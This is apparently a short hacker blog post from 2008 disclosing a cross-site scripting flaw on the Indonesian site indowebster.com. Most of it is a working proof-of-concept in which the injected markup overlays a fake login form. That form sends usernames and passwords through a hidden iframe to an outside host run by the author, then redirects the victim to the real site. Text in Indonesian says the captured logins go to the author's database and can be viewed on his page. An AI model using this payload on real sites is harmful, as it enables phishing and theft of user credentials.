Indowebster.com Phishing Vulnerability


  • SPYRO KiD
  • admin[~@t~]syrozone[~d.t~]net
  • Saturday, October 18th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: indowebster.com XSSED by SPYRO KiD}

indowebster.com XSSED by SPYRO KiD

 

POC

<form method="post" action="http://www.indowebster.com/login.php" target="new"><input name="username" id="username" value="&quot; type=&quot;hidden&quot; readonly=&quot;0&quot; style=&quot;position: absolute; left: 0; top: 0; width: 0px; color: #FFFFFF; border-style: solid; border-width: 0; padding: 0; background-color: #FFFFFF&quot; size=&quot;0&quot;&gt;&lt;/form&gt;&lt;form method=&quot;post&quot; action=&quot;http://spyrozone.black-it.net/playground/login.php&quot; target=&quot;kid&quot;&gt;&lt;input name=&quot;username&quot; id=&quot;username&quot; value=&quot;&quot; type=&quot;text&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=&quot;100&quot;&gt;&lt;p&gt;&lt;label for=&quot;password&quot;&gt;Password: &lt;/label&gt;&lt;/p&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;input name=&quot;password&quot; id=&quot;password&quot; type=&quot;password&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; width=&quot;100&quot;&gt;&lt;p&gt;&lt;input name=&quot;go&quot; class=&quot;formbutton&quot; value=&quot;Login&quot; type=&quot;submit&quot; onClick=setTimeout(&quot;window.location='http://www.indowebster.com/login.php';&quot;,7000);&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;a href=&quot;http://www.indowebster.com/register.php&quot;&gt;Belum terdaftar ?&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;  &lt;a href=&quot;http://www.indowebster.com/forgot.php&quot;&gt;Lupa password ?&lt;/a&gt;&lt;/p&gt;&lt;/fieldset&gt;&lt;/form&gt;&lt;iframe name=&quot;kid&quot; width=&quot;0&quot; height=&quot;0&quot; border=&quot;0&quot; frameborder=&quot;0&quot; src=&quot;&quot;&gt;&lt;/iframe&gt;&lt;noscript&gt;" type="hidden">
<input name="password" id="password" type="hidden">
<input name="go" value="Login" src="http://www.spyrozone.net/hacking/storage/2011/10/clickhere.png" type="image">
</form>

Login dengan account terserah. INGAT! Jangan login dengan account asli Anda karena informasi login akan terkirim ke database saya ^_^ . Setelah login, lihat hasilnya di: http://spyrozone.net/playground/indowebster.com-phising.php

Stay Alert, keep learning and Happy hacking!


//E.O.F